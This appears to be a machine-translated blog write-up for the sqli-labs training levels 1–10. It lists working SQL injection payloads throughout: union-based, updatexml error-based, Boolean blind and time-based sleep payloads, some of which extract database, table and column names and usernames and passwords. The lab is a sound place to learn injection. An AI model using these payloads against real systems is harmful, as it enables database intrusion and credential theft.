当前位置:网站首页>SQL lab 1~10 summary (subsequent continuous update)
SQL lab 1~10 summary (subsequent continuous update)
2022-07-07 12:23:00 【hcjtn】
sql The general process of Injection :
(1~6 Turn off )
Determine the injection point
- When id=1 and 1=2 – q Page exception is Probably It exists in sql Inject
- If the page appears illegal , Use other injections .
Determine the number of fields
- order by ( Sort the results according to the specified column ), The output number exceeds the number of columns , Report errors , Therefore, this feature can be used , Judge the number of columns .
Judge the echo point
- eg: union select 1,2,3 Page shows 2, It indicates that the echo point is 2
- Be careful : Must let id The value of is equal to a nonexistent value , In this way, the return value of the joint query will make union The subsequent query results are in the first column of the array . Only let id Is just a nonexistent value , We will know the true data
Search for relevant content
Judge database name
?id=-1 ’ union select 1,database(),3 – q( There is obvious dislocation )
Use updatexml An error injection ( There is no obvious dislocation )
grammar :
updatexml( The goal is xml Content ,xml Document path , Updated content )
updatexml(1,concat(0x7e,( select database())0x7e),1) (0x7e, A non-conforming character appears in the function , Make it an error , Pop up the name of the library we need )
?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) – q
Name of judgment table
?id=-1 ’ union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 1,1-- q
?id=-1 ’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ – q
group_concat Function defect : Will put the results together , It may make the answer incomplete
- limit What is the library name echoed by the function action limit
- ?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) – q ( There is no obvious dislocation )
Judge the listing
?id=-1 ’ union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ – q
?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q**( There is no obvious dislocation )**
?id=1"%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1),0x7e),1)–%20q
Judgment data :
?id=-1 ’ union select 1,id,3 from emails – q
?id=1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q
Extract the data :?id=-1 ’ union select 1,group_concat(concat_ws(’~’,usename,password)) from users – q
(7~10)
Different from the first four levels , Five to eight levels did not echo the searched information to the page ( Five or six levels of input error statements will show , But eight passes will not ), So blind injection is needed .( Or report a mistake , I said before )
- Bull's blind note
- lenth() function Return string length
- substr() function Intercepting string ( grammar :substr(str,pos,len);)
- ascii() Return character's ascii code [ Change characters into numbers well]
- Time type
- sleep() Hang the program for a while n by n second
- if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement If there is an error, execute the third statement .
- Bull's blind note
Bull's blind note The problem solving steps :( With sql-lab less-8 For example )
Get the length of the database name : ?id=1’ and (length(database()))=8-- q( utilize > < or = To determine the length of its database )
Get the database name :
?id=1’ and ascii(substr(database(),1,1))=115 Indicates from the database 1 Start taking a length ( You will get a decimal number , utilize ASCII Table converts it into letters or symbols ) The first is s、
It can also be done through burp suite To do it
Get the number of tables : ?id=1’ and (select count(*) from information_schema.tables where table_schema=‘security’)>5(=4)-- q
Get the length of the name of the table : ?id=1’and (select length(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1)>5(=6)-- q Yes 6 Length
Get the name of the table : ?id=1’and (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q The first is e
Get field name :?id=1’and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i
- Time blind note :( With sql-lab less-9 For example ) The problem solving steps
The Ninth level is found according to the blind note just now, no matter what conditions are entered , The echo result is a , It is proved that the Boolean blind note just now cannot be used , Try to use time blind
Parsing library name length : ?id=1’ and if(length(database())=8,sleep(5),1)-- q( If set up , Just react in five seconds , notes : there 1 It doesn't mean anything )
Resolve database name :?id=1’ and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name : ?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
边栏推荐
- 《看完就懂系列》天哪!搞懂节流与防抖竟简单如斯~
- 111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
- Sonar:Cognitive Complexity认知复杂度
- Summed up 200 Classic machine learning interview questions (with reference answers)
- wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
- 消息队列消息丢失和消息重复发送的处理策略
- Apache installation problem: configure: error: APR not found Please read the documentation
- NGUI-UILabel
- Time bomb inside the software: 0-day log4shell is just the tip of the iceberg
- 《通信软件开发与应用》课程结业报告
猜你喜欢
【神经网络】卷积神经网络CNN【含Matlab源码 1932期】
数据库系统原理与应用教程(011)—— 关系数据库
SwiftUI 4 新功能之掌握 WeatherKit 和 Swift Charts
idea 2021中文乱码
<No. 9> 1805. Number of different integers in the string (simple)
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
Unity中SmoothStep介绍和应用: 溶解特效优化
[data clustering] realize data clustering analysis based on multiverse optimization DBSCAN with matlab code
Visual Studio 2019 (LocalDB)\MSSQLLocalDB SQL Server 2014 数据库版本为852无法打开,此服务器支持782版及更低版本
【紋理特征提取】基於matlab局部二值模式LBP圖像紋理特征提取【含Matlab源碼 1931期】
随机推荐
Unity map auto match material tool map auto add to shader tool shader match map tool map made by substance painter auto match shader tool
Matlab implementation of Huffman coding and decoding with GUI interface
Completion report of communication software development and Application
Flet教程之 15 GridView 基础入门(教程含源码)
Flet教程之 18 Divider 分隔符组件 基础入门(教程含源码)
《看完就懂系列》天哪!搞懂节流与防抖竟简单如斯~
解决 Server returns invalid timezone. Go to ‘Advanced’ tab and set ‘serverTimezone’ property manually
DOM parsing XML error: content is not allowed in Prolog
(to be deleted later) yyds, paid academic resources, please keep a low profile!
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
牛客网刷题网址
2022年在启牛开华泰的账户安全吗?
[filter tracking] strapdown inertial navigation pure inertial navigation solution matlab implementation
关于 Web Content-Security-Policy Directive 通过 meta 元素指定的一些测试用例
Completion report of communication software development and Application
消息队列消息丢失和消息重复发送的处理策略
College entrance examination composition, high-frequency mention of science and Technology
Sonar:cognitive complexity
Camera calibration (2): summary of monocular camera calibration
TypeScript 接口继承